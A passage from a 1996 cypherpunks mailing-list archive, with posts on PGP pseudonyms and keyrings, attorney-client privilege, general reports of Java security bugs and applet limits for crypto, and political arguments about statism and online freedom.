reverse. And the ones in the NSA (and the rest of the US government) with
darker motives (power et al) are going to be in the first group - they're not
concerned with effects on US citizens.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 29 Apr 1996 15:07:28 +0800
To: jamesd@echeque.com
Subject: Re: code vs cypher
Message-ID: <01I434P7PXFQ8Y53B6@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jamesd@echeque.com" 28-APR-1996 19:31:33.43

>You continually bring up this irrelevant topic whenever someone complains
>about your egregious statism on other issues:  

	And what's wrong with being a statist on _some_ issues? A strict party
line will do nobody any good. In other words, politics makes strange
bedfellows, such as libertarians with (non-PC) liberals on many free-speech
issues, libertarians with militia types (including the neo-Nazis) on freedom
of association, etcetera.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 29 Apr 1996 15:59:36 +0800
To: Steve Reid <steve@edmweb.com>
Subject: Re: PGP and pseudonyms
In-Reply-To: <Pine.BSF.3.91.960428165931.10757A-100000@kirk.edmweb.com>
Message-ID: <Pine.GUL.3.93.960428201204.13032R-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Apr 1996, Steve Reid wrote:

> > >this pseudonym. If this person's secret keyring were stolen, could
> > >person=pseudonym be revealed, based on the key ID? Or would it require
> > >knowing the passphrase?
[...]
> I guess pseudonymity(sp?) wasn't the main concern when PGP was created.
> 
> I suppose a temporary fix would be to not use an ordinary PGP passphrase,
> but rather encrypt the whole secring.pgp file. Decrypt it when you need
> it, and be very careful to properly clean up when you're done.

Huh?

Just use multiple secring.pgp files, and toggle PGPPATH. What's the
problem? 

I guess that wouldn't be so convenient on the Mac version, I guess, but
you could write an AppleScript to swap file/folder names.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Mon, 29 Apr 1996 11:25:30 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <m0uDagf-00093GC@pacifier.com>
Message-ID: <Pine.3.89.9604282013.A25461-0100000@netcom4>
MIME-Version: 1.0
Content-Type: text/plain


	Jim:

On Sun, 28 Apr 1996, jim bell wrote:

> Government feeds on its own size; once government is dramatically reduced 
> below its current size, it will become even less able to resist further 

	The only true part of this paragraph is that government feeds	
	on its own size.  

> contraction.  Probably few government employees realize this.

	What was the name of that government department that was
	created to obtain and store Helium for the US dirigible 
	fleet?   And just how recently was it abolished.

        xan

        jonathon
        grafolog@netcom.com


**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*	ftp://ftp.netcom.com/pub/gr/graphology/home.html	     *
*								     *
*			     OR					     *
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Mon, 29 Apr 1996 16:11:43 +0800
To: cypherpunks@toad.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <Pine.3.89.9604281554.A30287-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.3.89.9604282014.F30933-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 28 Apr 1996 I wrote:

> One of these days I'm going to learn the art of succint writing.
And fact-checking too. Time to eat words.

> I don't think the rich are really the issue. From what Sandy, Black 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 29 Apr 1996 16:54:02 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Attorney-Client / Nyms
Message-ID: <Pine.SUN.3.93.960428210311.25014E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 28 Apr 1996, E. ALLEN SMITH wrote:

> From:	IN%"unicorn@schloss.li"  "Black Unicorn" 27-APR-1996 23:07:10.42
> 
> >Well, using attorney client confidentality to shield things otherwise
> >discoverable just doesn't work.
> 
> 	Given discussions as to attorneys holding passphrases, et al, perhaps
> a tutorial from the lawyers on the list (yourself and others, since
> disagreements among J.D.'s have been known to happen) on what attorney-client
> confidentiality does cover?

Proposed FRE 503 probably has the best codification of the prevailing
common law on the subject.  I reproduce it in part below.  Typos are mine.

(a) Definitions.  As used in this rule:

(1)  A "client" is a person, public officer, or corporation, association,
or other organization or entity, either public or private, who is rendered
professional legal services by a lawyer, or who consults with a lawyer
with a view to obtaining progessional legal services from him.

[...]

(b) General rule of privilege.  A client has a privilege to refuse to
disclose and to prevent any other person from disclosing confidential
communications made for the purposes of facilitiating the rendition of
professional legal services to the client, [between the attorney and the
client directly or indirectly].

(c) Who may claim the privilege.  The privilege may be claimed by the
client [or his agents or assigns etc.]  The person who was the lawyer at
the time of the communication may claim the privilege but only on behalf
of the client.  His authoriety to do so is presumed in the absence of
evidence to the contrary.

(d) Exceptions.  There is no privilege under this rule:

(1) Furtherance of crime or fraud.  If the services of the lawyer were
sought or obtained to enable or aid anyone to commit or plan to commit
what the client knew or reasonably should have known to be a crime or
fraud; or

(2) Claimants through the same deceased client.  As to communication
relevant to an issue between parties who claim through the samed deceased
client, regardless of whether the claims are by testate or intestate
succession or by inter vivos transaction; or

(3) Breach of duty by lawyer or client.  As to a communication relevant to
an issue of breach of duty by the lawyer to his client or by the client to
his lawyer; or

(4) Document attested by lawyer.  As to a communication relevant to an
issue concerning an attested document to which the lawyer is an attesting
witness; or

(5) Joint clients.  As to a communication relevant to matter of common
interest between two or more clients if the communication was made by any
of them to a lawyer retained or consulted in common, when offered in an
action between any of the clients.

(end)

Generally speaking the particulars of attorney-client relationships are
regulated by state statute, though some states define the provisions 
through common law.

Note the confidentiality requirement.  A client is estopped from claiming
privilege if he discloses the content of the communication to a third
party not connected to the attorney-client relationship.

The identity of the client and the existance of the attorney client
relationship are not confidential.  There are some exceptions.

Physical evidence is generally not protected by attorney client privilege
unless it is a manifestation of communications between attorney and client
(letters, documents etc.)

Communications regarding future crimes or frauds are not protected.

What I think you will be most interested in, however are the exception for
stolen property and destruction of evidence.  

Stolen property may be held by an attorney for a reasonable time for
inspection purposes, but must be returned to the rightful owner or the
attorney will be a receiver of stolen goods and participating in an
ongoing crime.  Privilege will thus not apply.  In re Ryder, 263 F.Supp.
360 (E.D.Va 1967).  (Some courts will permit the attorney to refuse to
disclose the source from which he obtained the property, however).
Consider this in the context of trade secrets.

All states have laws against destroying or concealing evidence.  The
attorney who advises his client to destroy evidence is a co-consiprator.
Privilege does not apply.  Clark v. State, 261 S.W.2d 339 (Crim. App Tex.
1953).  (Interesting to wonder if advising a client to encrypt evidence is
'concealing' it).

> 
> >There are many mail forwarding services that don't use attornies.  An
> >attorney is going to charge you by the hour for this service.  I don't
> >think you really want to pay for it.
> 
> 	Most of them aren't anonymous, either... although that does give me
> the thought of going to one outside the US and its reporting requirements.
> They'd know who I was (or at least the address it was going to), but at least
> nobody else would know. Any suggestions, since you've been writing of the joys
> of nymdom recently?

I suggest you use a forwarding service, sign up with your nym name, and
provide the address of a P.O. box for them to forward to, also in the name
of your nym.

> 	-Allen


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMYQU6S1onm9OaF05AQHN7ggAstl9Is4Yyt0ZSPiOJYBJvFqPoj8kNtQL
6TuIubS4Ybu+5tWEqI6O/llmwE0NGw9q8ow4zK4yAm7PnbtvcFsRvjLy+KlPbU6/
rVTd1EI9Qz6rGTiK99j3bBxdYsQv4p4AwiC/+sdR/ZJyq6+ZR5PX/RzqPO/Tfxc6
nlM/G0S4PcA45W4v+lDRbj8GTcRaTlziPAl8/8xJGPuapZBrt8Icl92dLrCAFu7e
vGe0u0yrRw/ljq2hQ1FjpQzEv4pbQ4XPxylqmoh7lTjkFw2KsT/pNb/36YUNisPv
4n4EiAcRCviVBSmaOF8DzgwANirTR5WEYj9ayIBwN5UmlwZnKWf/Bw==
=N2Wa
-----END PGP SIGNATURE-----


---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Mon, 29 Apr 1996 16:14:16 +0800
To: cypherpunks@toad.com
Subject: API for the next release of NOISE.SYS available...
Message-ID: <199604290135.VAA12948@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain



If you're interested in seeing the preliminary API for the next 
NOISE.SYS release, send a  message with the subject "send noise-api" 
and my mail filter will respond in kind.

Thoughful comments and criticisms or suggestions would be most 
welcome.

If you're seriously interested in taking a look at the source code 
before the next version is released (that is, if you intend to comb 
it for bugs, optimizations, security flaws, etc. etc.) drop me a 
line.


Rob. 

---
Send a blank message with the subject "send pgp-key"
to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 29 Apr 1996 15:16:08 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: My nym: Statement
Message-ID: <Pine.SUN.3.93.960428215100.25014G-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


I thought I would take a moment to discuss my nym, given the Web of Trust
issues floating about right now.

When I developed this nym I hoped to merely avoid connecting my political
views with my real life persona.  Generally speaking many of my
associates, my family and what clients I still serve would find my
political views somewhat distasteful.  It was with a view to prevent this
connection that I originally created the nym on cypherpunks.

As time went by I found it useful for other reasons involving my
previous employer which I won't go into in detail.

Some on the list have met me, either at the cypherpunks meeting in D.C.
when the clipper issue was emerging, or relating to ongoing and emerging
projects.  Others have spoken to me on the phone extensively or briefly.

Really I preserve the nym for reputation capital more than anything else.

I serve the list best with my input (whether you agree with it or not)
when there is some reputation context attached.  Hopefully the majority of
it relates to the perception that I post 'good' material or that I 'have a
clue.'  With any luck some of you are not so quick to delete messages that
bear my address as you would be to delete something from
"nobody@whereever.com."  By the same token, certainly some of you are
burning up the "D" key when I post a lot.  If nothing else a consistant
address helps in filtering.  Those generally interested in my subjects of
expertise and interest will have an extra bit of filtering information
(1=is a black unicorn post) as will those who find my posts annoying.

When I communicate securely it's generally with people who I have some
business or personal dealings with.  This tends to eliminate the need for
me to be extensively interwraped in the web of trust.  Those who don't
know me would be as unwise to send me sensitive mailings as they would be
to cc: fbi.gov.  (At least until "is not a fed" signatures start to become
popular).

Because most of my encrypted traffic is of a financial and business nature
I like the overkill of a 2048 bit key.  I also want a published 2048 bit
key in the event it becomes difficult to publically distribute keys in the
future.

The man in the middle problem with my nym is not really an issue as far as
I can tell.  I suppose someone might argue that they wouldn't want to mail
me anything asking for legal advice for fear it might be intercepted and
returned to them with disinformation attached.  As these are people I
generally don't know, it's equally likely to them that I am simply an
agent provocateur who has no man in the middle problems.

- From my end, man in the middle attacks are difficult to use against me
because those with whom I have extensive business and personal
communications know me well enough to permit end to end verification
through seperate secure channels.  (I use secure telephones regularly, and
this permits voice recognition).

"But you could be more than one person..."

So?  Do you like this group's legal and political views?  Then who cares
how many people I am?

I suppose if it makes people happy I will get 10 signatures binding me
strongly to the larger web of trust.  It's never seemed worth the effort
before.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMYQf/S1onm9OaF05AQHBFQf/cHK9XAeFsWSGb02skl+2Tbr71fBb5EB9
B9ySM9+z6pbaXlTrpE5b4U2951Q3qidpppm09f05KHKYhfdVjck3I2vvoF1tFa9q
gVZnjW8CmiYQFc7F65wvvdvjeet7sB4+ki/PbojXz9cYt7x5mDegdPWEOAx82yh1
eLs3WyMqUAL2NUqNaL48Dr7Y8xSvO24qdyARC4FHEvDQFomhYme6kZ33RKtKaoFx
K2qCGYEJkyaIMtNkBYR5B15JPhmLuEKUbHDkQYiaYv1cRKguF55nGlh9vsq6Qr5j
oyB5MkK8sZZKqwIFnUPLwxD3d1DCgvm5gWV3W2LeiQq9Ovk74Nh95A==
=Xm1B
-----END PGP SIGNATURE-----


---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 29 Apr 1996 17:35:54 +0800
To: cypherpunks@toad.com
Subject: Re:  Java security weaknesses
Message-ID: <199604290457.VAA22845@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


To add to the list of Java security weaknesses from the Princeton paper
I posted the other day, I saw a new one on comp.lang.java this
afternoon.  It is another bug in the bytecode verifier, different from
the one discovered by the Princeton group, that allows you to bypass
the security mechanisms completely.  Details are not yet available.

Apparently the earlier bytecode verifier bug still does not have a fix
available.  However the nature of the bug itself was kept secret until
last week.  Now that it is out I hope Sun and Netscape will push to get
the fix available ASAP.  The bug appears to require considerable
sophistication to exploit (understanding the details of the class
resolution mechanism).  Still with the talent which is out there on the
net I imagine it will only be another week or two at most before a
demonstration exploit appears.

I hope the extended delay in making the fix available means that an
intensive review of the code is being conducted, so that for example this
other bug will have been fixed as well in the new release.  I certainly
hope that it won't be another month before a fix comes out for this new
bug.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 29 Apr 1996 19:34:56 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: code vs cypher
In-Reply-To: <01I434P7PXFQ8Y53B6@mbcl.rutgers.edu>
Message-ID: <Pine.GUL.3.93.960428202142.13032S-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Apr 1996, E. ALLEN SMITH wrote:

> From:   IN%"jamesd@echeque.com" 28-APR-1996 19:31:33.43
> 
> >You continually bring up this irrelevant topic whenever someone complains
> >about your egregious statism on other issues:
> 
>         And what's wrong with being a statist on _some_ issues? A strict party
> line will do nobody any good. In other words, politics makes strange
> bedfellows, such as libertarians with (non-PC) liberals on many free-speech
> issues, libertarians with militia types (including the [censored]) on freedom
> of association, etcetera.

Er... thanks, but no thanks. This presumes that James's characterization
of my positions on other issues is correct, and I do not believe that it
is.

Astute readers may remember that I "became" a FUCKING STATIST because I
objected to Jim Bell's idea that no government employee deserved any
privacy in his or her personal life. I adopted the epithet because I
thought it was funny. 

I do not recall defending any statist policies. I did not defend the
[censored], and indeed to defend the [censored] would not have been
egregious statism, or indeed any kind of statism at all, because we were
talking about private pressure on private ISPs. I am well aware that the
[censored] has favored arbitrary statist controls in other countries and
circumstances, but I do not recall ever discussing those policies of the
[censored] with anyone here.

In fact, most [censored], [censored], and [censored], and all regular
posters to alt.revisionism save one, have criticized the [censored] rather
roundly, and supported free speech for [censored].

I am not [censored], and I do not support the [censored]. I do not believe
I have ever defended any policy of the [censored]. I have merely
endeavored that in their zeal to demonstrate opposition to the policies of
the [censored], some more activist folks such as [censored], [censored],
and [censored] have strayed a bit too far into the deep end by criticizing
positions that the [censored] does not, in fact, hold.

My position on most such issues is yes, the walls are closing in, but the
sky is not falling. I'd rather look on the bright side sometimes, and I
will never accept untruths, especially from friends.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Mon, 29 Apr 1996 15:37:43 +0800
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: Click here to become an International Arms Trafficker
In-Reply-To: <2.2.32.19960426091033.00688010@gateway>
Message-ID: <Pine.SUN.3.91.960428221525.16777A-100000@dorsai>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Apr 1996, David K. Merriman wrote:

> At 02:46 PM 04/26/96 -0400, Vince Cate wrote:
> >
> >   "Click here to become an International Arms Trafficker"
> >
> >Offshore Information Services Ltd. has set up a web page to make it really
> >easy for people to become International Arms Traffickers.  All they have to
> >do is fill in their name and email address and then click.  Check out:
> >
> >   http://online.offshore.com.ai/arms-trafficker/
> >
> >If you think this is half as funny as I do, please make a link from
> >one of your pages to this one.
> >
> 
> Well, I'm ITAR violator # 6 :-)

I just made ITAR violator #66 on this page. :^) ROTFL!!!  And while I'm 
at it, there's a CDA violation in my .signature file - I'm sure flirting 
with the law tonight! Heheheheheh!


==========================================================================
 + ^ + |  Ray Arachelian |FH|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@dorsai.org|UE|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| --------------- |CC|What part of 'Congress shall make no |=\/|\/=
  /|\  |    Just Say     |KD|law abridging the freedom of speech' |==\|/==
 + v + | "No" to the NSA!|TA|        do you not understand?       |=======   
===================http://www.dorsai.org/~sunder/=========================
Obscenity laws are the crutches of inarticulate motherfuckers-Fuck the CDA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Mon, 29 Apr 1996 12:16:58 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <m0uDeWY-000900C@pacifier.com>
Message-ID: <Pine.3.89.9604282226.A2147-0100000@netcom4>
MIME-Version: 1.0
Content-Type: text/plain


Jim:

On Sun, 28 Apr 1996, jim bell wrote:
> For most of this century, government (and in particular, 
> the Federal government) has been on a fast-track to expansion. 

	I'm glad you read some history books.

> Only quite recently has this expansion begun to slow.  I was 
	
	And even read some current newspapers.

> referring to contractions to come; not to contractions (if any?)
> that have occurred in the past.

	But had you learned anything from history, you would have
	discovered that governments to do not contract in size.

	The Strategic Helium Reserve was just one contemporary example
	of how government departments hang around, totally unneeded.


        xan

        jonathon
        grafolog@netcom.com


**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*	ftp://ftp.netcom.com/pub/gr/graphology/home.html	     *
*								     *
*			     OR					     *
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Mon, 29 Apr 1996 19:21:10 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: connecting Uni to the Web O Trust
In-Reply-To: <Pine.SUN.3.93.960428162347.12806D-100000@polaris.mindport.net>
Message-ID: <199604290521.WAA21769@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> (Sigh).  I'll say it yet a third time.  Get a current copy of my key which
> is signed by at least three people on the web of trust.

	As if this "web of trust" was actually worth something.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 29 Apr 1996 20:36:01 +0800
To: cypherpunks@toad.com
Subject: Re: The Joy of Java
Message-ID: <199604290530.WAA25425@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Somewhat independent of the security/safety issues regarding Java
applets, there are also questions about their suitability for crypto
applications.  Applets currently labor under several restrictions (at
least when part of the Netscape browser) which make it hard to do crypto:

  Applets cannot accept net connections, and they can only make outgoing
  connections to the host which provided them to the browser.

  Applets cannot read or write local disk files.

  Applets cannot access other local hardware, such as smart cards,
  printers, or microphones.

These restrictions make several things difficult.  Finding good sources
of entropy for random numbers is hard.  Applets do have millisecond
resolution event timers (provided that the implementation keeps times to
that resolution, of which there is no guarantee), so they can get some
entropy by keystroke timings or mouse movements.  But they have little
access to disk files or other sources of environmental noise.

Retaining secure information between runs is also hard.  Specifically,
there is no place to store key data other than by sending it to the
server and having it put it somewhere.  It would not be hard to have an
applet which created a public key, but the key would have to be stored in
an insecure location.  So the best it could do would be to encrypt the
key with a user specified pass phrase and hope that was strong enough.

The restriction on connections makes other applications difficult.  To
make an applet which can send PGP compatible email it needs to be able to
look up keys on the key servers.  This can only work if the host serving
the applet can look up keys for it.  It has to be either running a key
server or able to forward requests to one.  This requirement makes the
applet not "self contained" in that to put it on your web pages you also
have to have this other infrastructure in place.

Another problem is in trusting applets.  Imagine an applet to help you
participate in electronic commerce.  Just type in your ecash pass phrase
and it will help you open your ecash account and then charge you tiny
amounts as you surf the web.  But of course if the applet is capable of
withdrawing small amounts, it would also be able to withdraw big amounts
as well.  It could drain your bank account before you knew it.

Some of these problems might be fixed by giving applets limited access to
disk files.  But even then it would be risky to let an applet see your
PGP secret key ring or ecash wallet.

Signed applets can probably help with some of these as well.  If Phil
Zimmermann has signed the PGP applet, maybe you'll trust it as much as
you trust the PGP executable.  Likewise if Chaum has signed the ecash
applet you'll trust it as much as you trust the ecash software.

The thing to keep in mind is that you are already trusting people when
you use their code, or virtually any code for that matter.  PGP is
special because source is available.  Of course most people don't have
any guarantee that your particular binary was built from the source
that you see.  But all the other software you run makes you vulnerable.
How do you know that DOOM, for example, doesn't check to see if there is
a network connection and send out your PGP secret key ring?  You even
have a pointer to it in your PGPPATH environment variable.  Maybe that's
unlikely because you'd see your modem lights flash suspiciously, but how
about networking applications?  Suppose Microsoft's Internet Explorer
rummaged through key rings and wallets, piggybacking packets on your
output data as you browse?  You'd probably never know.

So there are limits to how much safety you can expect.  Hopefully with
signed applets it will be OK to authorize some overrides of the current
restrictions so that these other kinds of applications can be provided.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 29 Apr 1996 16:06:41 +0800
To: unicorn@schloss.li
Subject: Re: arbiter/escrow agent for hire
Message-ID: <01I43AVX02IO8Y53CU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 28-APR-1996 20:43:07.41
>My key is available on the keyservers, as far as I know.

>Sandy Sandfort, for one, has spoken with me extensively and his signature
>is on my key.  If you like, I suggest you ask him as to his view of my
>credibility/continuity.

	My information would appear to be out of date; I was getting it from
one of the web-of-trust studies which stated that your new key was not
signed by anything except itself. Sorry.

>Note, this hardly assures you that I'm not several people working
>together, merely that this nym is connected to at least one person who
>posts on cypherpunks regularly and has had a presence here since just
>after the lists foundation.

	It would admittedly help if your messages were signed also; this would
provide somewhat of an additional confirmation. However, I very well understand
that this is not always possible/practical; note that I don't have a key yet.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 29 Apr 1996 15:33:24 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <01I43B16HT2U8Y53CU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"s1113645@tesla.cc.uottawa.ca" 28-APR-1996 19:36:41.10

>What is interesting is how it applies to the middle-class, where most of 
>the tax-base is. 

	Currently, yes... but the divide between rich and poor is growing.
(So long as this divide is determined by merit, and the poor still have enough
to survive, I'd call this a good trend. So would various other people on this
list, perhaps without my caveats.) In other words, the middle class is going
up or down. The factory workers are going down; the high-ability workers
(including information workers) are going up. So just talking about the rich
makes sense.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 29 Apr 1996 15:26:36 +0800
To: tomw@netscape.com
Subject: Re: Mindshare and Java
Message-ID: <01I43B7OQJE88Y53CU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tomw@netscape.com"  "Tom Weinstein" 28-APR-1996 20:13:00.23

>Rich Graves wrote:
> 
>> 3. If I am Jack the Ripper, I have a way of proving that the code is
>>    my intellectual property.

>How do you prove that?  If I strip off your signature and sign it
>myself, how do you know it's yours?

	Prior publication or timestamping. Admittedly, you could have come up
with the same stuff independently (and will probably have modified some
unimportant respects so that the code is different, even if you didn't). But
that problem is there in any copyrighting/anti-plagarism scheme. For instance,
I recently had an idea on genetic algorithms (I've been researching coding
techniques for them.) I then came across a version of it in a journal, so I
have to cite that journal when I give the idea - even though I came up with it
independently.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 29 Apr 1996 19:39:23 +0800
To: Rich Graves <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: code vs cypher
Message-ID: <199604290602.XAA02064@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:01 PM 4/28/96 -0700, Rich Graves wrote:
> I do not recall defending any statist policies. I did not defend the
> [SMC call to silence Nazis], and indeed to defend the 
> [SMC ] would not have been
> egregious statism, or indeed any kind of statism at all, 

I do not recall anyone accusing you of statism on the SMC call to cut
Nazi net access -- probably because I deleted all that tedious crap, 
not because nobody accused you.

I and others accused you of statism on various other matters, such as
your claim that those who fail to pay taxes steal from society, and I just
accused you of always changing the subject to Nazism whenever somebody
accuses you of statism.

And I also accused you of talking about Nazism much too much.

And what happened:  You immediately changed the subject to Nazism.

Cut the nazism, please.  Statism is sometimes on topic.  Nazism will
not be on topic until the next serious threat to Nazi's net access.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: angels@wavenet.com (CyberAngels Director : Colin Gabriel Hatcher)
Date: Mon, 29 Apr 1996 20:03:58 +0800
To: "Allen B. Ethridge" <ethridge@onramp.net>
Subject: Freedom and security
Message-ID: <v01510107a9e4964f3008@[198.147.118.206]>
MIME-Version: 1.0
Content-Type: text/plain



>No.  "Those who sacrifice security for freedom, will have neither" is
>not consistent with Franklin's statement, nor is it true.  Security and
>freedom are antithetical, and worse than that, security is always an
>illusion.  But you can have your illusion, as long as you keep it out of
>my life.  Censor yourself if you wish, but don't censor anything I might
>want to look up.
>

The relationship / balance between security and freedom is always a
defining factor in a society.  My point is that a society with no laws and
no codes of conduct is not a free society.  This is not the same thing as
saying that all societies need government.   Small communities can and do
operate without major legislation, using what sociologists refer to as
"informal social controls", e.g. peer pressure.  But even those small
communities require and enforce boundaries on the conduct of their members.
There is no society that tolerates the murder of its innocent members.

The Internet may once have been one of those small close knit communities,
small enough not to require law enforcement - although even then it had
rules that had to be followed.  But that Internet is gone, and it will
never return, because now its the biggest city in the world, and the
history of the change from pastoral communities to urban life, to the
development of nation states and power blocs is also the history of crime.
And as the Internet grows, so will its security problems.

My position is to seek a balance between the freedom of the individual and
the security of the community.  My argument is that when the security of
the community is threatened by the freedom of the individual, the community
will always prioritise its safety.  Good government of course means
maintaining individual freedoms *and* maintaining community security.  I
actually disagree that they are antithetical.  On the contrary they are a
balance that any society has to find.  Where individual freedom takes over
you have the urban jungle where predators consume prey.  Where security
takes over you have the totalitarian state.  Neither is necessary nor
inevitable.

We are simply concentrating on the problem from two different angles.  My
concern is to maximise community safety while protecting individual
freedom.  Your angle is to maximise individual freedom while protecting
community safety.  There is IMHO very little difference between the two.



*********************************************************
Colin Gabriel Hatcher - CyberAngels Director
angels@wavenet.com

"Two people may disagree, but
that does not mean that one of them is evil"

*********************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Mon, 29 Apr 1996 16:12:02 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <01I43B16HT2U8Y53CU@mbcl.rutgers.edu>
Message-ID: <Pine.3.89.9604282225.B28833-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 28 Apr 1996, E. ALLEN SMITH wrote:

> From:	IN%"s1113645@tesla.cc.uottawa.ca" 28-APR-1996 19:36:41.10
> 
> >What is interesting is how it applies to the middle-class, where most of 
> >the tax-base is. 
> 
> 	Currently, yes... but the divide between rich and poor is growing.
> (So long as this divide is determined by merit, and the poor still have enough
> to survive, I'd call this a good trend. So would various other people on this
> list, perhaps without my caveats.) In other words, the middle class is going
I agree with your caveat. It's where the anarchists get me skeptical.

> up or down. The factory workers are going down; the high-ability workers
> (including information workers) are going up. So just talking about the rich
> makes sense.

Someone sent me some US income tax figures. It would seem that the vast
